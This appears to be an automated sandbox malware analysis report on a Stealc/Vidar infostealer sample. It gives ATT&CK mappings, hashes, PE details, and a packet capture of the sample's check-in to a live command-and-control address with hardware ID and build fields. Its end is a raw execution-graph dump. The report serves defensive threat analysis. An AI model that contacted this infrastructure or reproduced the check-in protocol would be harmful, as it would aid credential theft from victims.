Source: Yara match | File source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (a number before a technique name is the count of matching signatures; cells without a number are not matched for this sample)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37 | file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpuL | file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37L | file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown

Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532741
Start date and time: 2024-10-13 21:03:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                      No simulations
IP Context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php

Domain Context: No context

ASN Context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37

JA3 Fingerprint Context: No context
Dropped File Context: No context
No created / dropped files found

Static File Info
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9478766132001075
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'854'976 bytes
MD5: 054dffcd797e0e40c9e7b3050814f148
SHA1: d5d545a246bb31a238e4a2632bdc878a35bd8d7e
SHA256: 6dbfc677cbb25ac652a97431f9afc4811639b3dae9b640976c0b9bb8d9a54404
SHA512: b03a463b63730b096ceabda5deefd631199b89e79e56f8e8a0bdf8f7b14f0ec89998ac65acfd8ef18bbe9b863d14a3bb2f3424974a3b1fb53e6323d5d97be61e
SSDEEP: 49152:PN3hmoVX/5v537z9p56k9SrdZrsIip8GIJSHfdafIYxJj8Q:nm21537z9p4nrzsIJJS/d1Oj8
TLSH: 278533872BE96C71E6F9DB764A0F3E47E2B22FD8418363FB9404D05909A5C715A3D02B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000

Static PE Info
Entrypoint: 0xaa1000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F7F14B4C8FAh
                      cvttps2pi mm3, qword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F7F14B4E8F5h
                      add byte ptr [eax], al
                      (the same instruction, add byte ptr [eax], al, is listed 92 times in a row: the bytes following the second jmp are all 0x00)
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      (unnamed) | 0x1000 | 0x25b000 | 0x22800 | d80fe44726714cd804974098735d69c0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      (unnamed) | 0x25e000 | 0x2a3000 | 0x200 | d87aaad9220892c0cc0bf5df02e89980 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      yhphlozs | 0x501000 | 0x19f000 | 0x19ea00 | 35f5083384d3f7726e928914ac15fff2 | False | 0.9949685097603256 | data | 7.95378057749378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      rdjojuwm | 0x6a0000 | 0x1000 | 0x600 | 0d20971c6dbd5bdf53ced50d55ccd832 | False | 0.6028645833333334 | data | 5.1654108440726985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x6a1000 | 0x3000 | 0x2200 | 927926d4e56e47d895a14e19cf718572 | False | 0.00666360294117647 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-10-13T21:04:08.967465+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 13, 2024 21:04:07.949281931 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Oct 13, 2024 21:04:07.954263926 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                      Oct 13, 2024 21:04:07.954368114 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Oct 13, 2024 21:04:07.954925060 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Oct 13, 2024 21:04:07.959793091 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                      Oct 13, 2024 21:04:08.684165955 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                      Oct 13, 2024 21:04:08.684417963 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Oct 13, 2024 21:04:08.731739044 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Oct 13, 2024 21:04:08.736891031 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                      Oct 13, 2024 21:04:08.967363119 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                      Oct 13, 2024 21:04:08.967464924 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Oct 13, 2024 21:04:12.519870996 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 13, 2024 21:04:35.364052057 CEST | 53 | 58413 | 162.159.36.2 | 192.168.2.6
                      Oct 13, 2024 21:04:35.922825098 CEST | 59407 | 53 | 192.168.2.6 | 1.1.1.1
                      Oct 13, 2024 21:04:35.930768967 CEST | 53 | 59407 | 1.1.1.1 | 192.168.2.6
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Oct 13, 2024 21:04:35.922825098 CEST | 192.168.2.6 | 1.1.1.1 | 0xfd8a | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Oct 13, 2024 21:04:35.930768967 CEST | 1.1.1.1 | 192.168.2.6 | 0xfd8a | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                      • 185.215.113.37
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | 4392 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Oct 13, 2024 21:04:07.954925060 CEST | 89 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Oct 13, 2024 21:04:08.684165955 CEST | 203 | IN | HTTP/1.1 200 OK
                      Date: Sun, 13 Oct 2024 19:04:08 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Oct 13, 2024 21:04:08.731739044 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFI
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a
                      Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--
                      Oct 13, 2024 21:04:08.967363119 CEST | 210 | IN | HTTP/1.1 200 OK
                      Date: Sun, 13 Oct 2024 19:04:08 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=



                      Target ID:0
                      Start time:15:04:02
                      Start date:13/10/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x5c0000
                      File size:1'854'976 bytes
                      MD5 hash:054DFFCD797E0E40C9E7B3050814F148
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:8.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
                        execution_graph (graph rendering; the raw node and edge dump is not reproduced here). The graph starts at node 13195 (0x5d69f0). API calls attached to its nodes, in order of first appearance: GetSystemTime, OpenEventA, CloseHandle, Sleep, CreateEventA, GetPEB, LoadLibraryA, GetProcAddress, lstrcpy, ExitProcess, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, GlobalMemoryStatusEx, __aulldiv, GetUserDefaultLangID, GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA, lstrlen, lstrcat, sscanf, SystemTimeToFileTime, GetWindowsDirectoryA, InternetOpenA, VirtualProtect, VirtualFree.
13961 5c45c0 2 API calls 13960->13961 13962 5c35d7 13961->13962 13963 5c45c0 2 API calls 13962->13963 13964 5c35f0 13963->13964 13965 5c45c0 2 API calls 13964->13965 13966 5c3609 13965->13966 13967 5c45c0 2 API calls 13966->13967 13968 5c3622 13967->13968 13969 5c45c0 2 API calls 13968->13969 13970 5c363b 13969->13970 13971 5c45c0 2 API calls 13970->13971 13972 5c3654 13971->13972 13973 5c45c0 2 API calls 13972->13973 13974 5c366d 13973->13974 13975 5c45c0 2 API calls 13974->13975 13976 5c3686 13975->13976 13977 5c45c0 2 API calls 13976->13977 13978 5c369f 13977->13978 13979 5c45c0 2 API calls 13978->13979 13980 5c36b8 13979->13980 13981 5c45c0 2 API calls 13980->13981 13982 5c36d1 13981->13982 13983 5c45c0 2 API calls 13982->13983 13984 5c36ea 13983->13984 13985 5c45c0 2 API calls 13984->13985 13986 5c3703 13985->13986 13987 5c45c0 2 API calls 13986->13987 13988 5c371c 13987->13988 13989 5c45c0 2 API calls 13988->13989 13990 5c3735 13989->13990 13991 5c45c0 2 API calls 13990->13991 13992 5c374e 13991->13992 13993 5c45c0 2 API calls 13992->13993 13994 5c3767 13993->13994 13995 5c45c0 2 API calls 13994->13995 13996 5c3780 13995->13996 13997 5c45c0 2 API calls 13996->13997 13998 5c3799 13997->13998 13999 5c45c0 2 API calls 13998->13999 14000 5c37b2 13999->14000 14001 5c45c0 2 API calls 14000->14001 14002 5c37cb 14001->14002 14003 5c45c0 2 API calls 14002->14003 14004 5c37e4 14003->14004 14005 5c45c0 2 API calls 14004->14005 14006 5c37fd 14005->14006 14007 5c45c0 2 API calls 14006->14007 14008 5c3816 14007->14008 14009 5c45c0 2 API calls 14008->14009 14010 5c382f 14009->14010 14011 5c45c0 2 API calls 14010->14011 14012 5c3848 14011->14012 14013 5c45c0 2 API calls 14012->14013 14014 5c3861 14013->14014 14015 5c45c0 2 API calls 14014->14015 14016 5c387a 14015->14016 14017 5c45c0 2 API calls 14016->14017 14018 5c3893 14017->14018 14019 5c45c0 2 API calls 14018->14019 14020 5c38ac 14019->14020 14021 5c45c0 2 API calls 14020->14021 14022 5c38c5 14021->14022 14023 5c45c0 2 
API calls 14022->14023 14024 5c38de 14023->14024 14025 5c45c0 2 API calls 14024->14025 14026 5c38f7 14025->14026 14027 5c45c0 2 API calls 14026->14027 14028 5c3910 14027->14028 14029 5c45c0 2 API calls 14028->14029 14030 5c3929 14029->14030 14031 5c45c0 2 API calls 14030->14031 14032 5c3942 14031->14032 14033 5c45c0 2 API calls 14032->14033 14034 5c395b 14033->14034 14035 5c45c0 2 API calls 14034->14035 14036 5c3974 14035->14036 14037 5c45c0 2 API calls 14036->14037 14038 5c398d 14037->14038 14039 5c45c0 2 API calls 14038->14039 14040 5c39a6 14039->14040 14041 5c45c0 2 API calls 14040->14041 14042 5c39bf 14041->14042 14043 5c45c0 2 API calls 14042->14043 14044 5c39d8 14043->14044 14045 5c45c0 2 API calls 14044->14045 14046 5c39f1 14045->14046 14047 5c45c0 2 API calls 14046->14047 14048 5c3a0a 14047->14048 14049 5c45c0 2 API calls 14048->14049 14050 5c3a23 14049->14050 14051 5c45c0 2 API calls 14050->14051 14052 5c3a3c 14051->14052 14053 5c45c0 2 API calls 14052->14053 14054 5c3a55 14053->14054 14055 5c45c0 2 API calls 14054->14055 14056 5c3a6e 14055->14056 14057 5c45c0 2 API calls 14056->14057 14058 5c3a87 14057->14058 14059 5c45c0 2 API calls 14058->14059 14060 5c3aa0 14059->14060 14061 5c45c0 2 API calls 14060->14061 14062 5c3ab9 14061->14062 14063 5c45c0 2 API calls 14062->14063 14064 5c3ad2 14063->14064 14065 5c45c0 2 API calls 14064->14065 14066 5c3aeb 14065->14066 14067 5c45c0 2 API calls 14066->14067 14068 5c3b04 14067->14068 14069 5c45c0 2 API calls 14068->14069 14070 5c3b1d 14069->14070 14071 5c45c0 2 API calls 14070->14071 14072 5c3b36 14071->14072 14073 5c45c0 2 API calls 14072->14073 14074 5c3b4f 14073->14074 14075 5c45c0 2 API calls 14074->14075 14076 5c3b68 14075->14076 14077 5c45c0 2 API calls 14076->14077 14078 5c3b81 14077->14078 14079 5c45c0 2 API calls 14078->14079 14080 5c3b9a 14079->14080 14081 5c45c0 2 API calls 14080->14081 14082 5c3bb3 14081->14082 14083 5c45c0 2 API calls 14082->14083 14084 5c3bcc 14083->14084 14085 5c45c0 2 API calls 
14084->14085 14086 5c3be5 14085->14086 14087 5c45c0 2 API calls 14086->14087 14088 5c3bfe 14087->14088 14089 5c45c0 2 API calls 14088->14089 14090 5c3c17 14089->14090 14091 5c45c0 2 API calls 14090->14091 14092 5c3c30 14091->14092 14093 5c45c0 2 API calls 14092->14093 14094 5c3c49 14093->14094 14095 5c45c0 2 API calls 14094->14095 14096 5c3c62 14095->14096 14097 5c45c0 2 API calls 14096->14097 14098 5c3c7b 14097->14098 14099 5c45c0 2 API calls 14098->14099 14100 5c3c94 14099->14100 14101 5c45c0 2 API calls 14100->14101 14102 5c3cad 14101->14102 14103 5c45c0 2 API calls 14102->14103 14104 5c3cc6 14103->14104 14105 5c45c0 2 API calls 14104->14105 14106 5c3cdf 14105->14106 14107 5c45c0 2 API calls 14106->14107 14108 5c3cf8 14107->14108 14109 5c45c0 2 API calls 14108->14109 14110 5c3d11 14109->14110 14111 5c45c0 2 API calls 14110->14111 14112 5c3d2a 14111->14112 14113 5c45c0 2 API calls 14112->14113 14114 5c3d43 14113->14114 14115 5c45c0 2 API calls 14114->14115 14116 5c3d5c 14115->14116 14117 5c45c0 2 API calls 14116->14117 14118 5c3d75 14117->14118 14119 5c45c0 2 API calls 14118->14119 14120 5c3d8e 14119->14120 14121 5c45c0 2 API calls 14120->14121 14122 5c3da7 14121->14122 14123 5c45c0 2 API calls 14122->14123 14124 5c3dc0 14123->14124 14125 5c45c0 2 API calls 14124->14125 14126 5c3dd9 14125->14126 14127 5c45c0 2 API calls 14126->14127 14128 5c3df2 14127->14128 14129 5c45c0 2 API calls 14128->14129 14130 5c3e0b 14129->14130 14131 5c45c0 2 API calls 14130->14131 14132 5c3e24 14131->14132 14133 5c45c0 2 API calls 14132->14133 14134 5c3e3d 14133->14134 14135 5c45c0 2 API calls 14134->14135 14136 5c3e56 14135->14136 14137 5c45c0 2 API calls 14136->14137 14138 5c3e6f 14137->14138 14139 5c45c0 2 API calls 14138->14139 14140 5c3e88 14139->14140 14141 5c45c0 2 API calls 14140->14141 14142 5c3ea1 14141->14142 14143 5c45c0 2 API calls 14142->14143 14144 5c3eba 14143->14144 14145 5c45c0 2 API calls 14144->14145 14146 5c3ed3 14145->14146 14147 5c45c0 2 API calls 14146->14147 
14148 5c3eec 14147->14148 14149 5c45c0 2 API calls 14148->14149 14150 5c3f05 14149->14150 14151 5c45c0 2 API calls 14150->14151 14152 5c3f1e 14151->14152 14153 5c45c0 2 API calls 14152->14153 14154 5c3f37 14153->14154 14155 5c45c0 2 API calls 14154->14155 14156 5c3f50 14155->14156 14157 5c45c0 2 API calls 14156->14157 14158 5c3f69 14157->14158 14159 5c45c0 2 API calls 14158->14159 14160 5c3f82 14159->14160 14161 5c45c0 2 API calls 14160->14161 14162 5c3f9b 14161->14162 14163 5c45c0 2 API calls 14162->14163 14164 5c3fb4 14163->14164 14165 5c45c0 2 API calls 14164->14165 14166 5c3fcd 14165->14166 14167 5c45c0 2 API calls 14166->14167 14168 5c3fe6 14167->14168 14169 5c45c0 2 API calls 14168->14169 14170 5c3fff 14169->14170 14171 5c45c0 2 API calls 14170->14171 14172 5c4018 14171->14172 14173 5c45c0 2 API calls 14172->14173 14174 5c4031 14173->14174 14175 5c45c0 2 API calls 14174->14175 14176 5c404a 14175->14176 14177 5c45c0 2 API calls 14176->14177 14178 5c4063 14177->14178 14179 5c45c0 2 API calls 14178->14179 14180 5c407c 14179->14180 14181 5c45c0 2 API calls 14180->14181 14182 5c4095 14181->14182 14183 5c45c0 2 API calls 14182->14183 14184 5c40ae 14183->14184 14185 5c45c0 2 API calls 14184->14185 14186 5c40c7 14185->14186 14187 5c45c0 2 API calls 14186->14187 14188 5c40e0 14187->14188 14189 5c45c0 2 API calls 14188->14189 14190 5c40f9 14189->14190 14191 5c45c0 2 API calls 14190->14191 14192 5c4112 14191->14192 14193 5c45c0 2 API calls 14192->14193 14194 5c412b 14193->14194 14195 5c45c0 2 API calls 14194->14195 14196 5c4144 14195->14196 14197 5c45c0 2 API calls 14196->14197 14198 5c415d 14197->14198 14199 5c45c0 2 API calls 14198->14199 14200 5c4176 14199->14200 14201 5c45c0 2 API calls 14200->14201 14202 5c418f 14201->14202 14203 5c45c0 2 API calls 14202->14203 14204 5c41a8 14203->14204 14205 5c45c0 2 API calls 14204->14205 14206 5c41c1 14205->14206 14207 5c45c0 2 API calls 14206->14207 14208 5c41da 14207->14208 14209 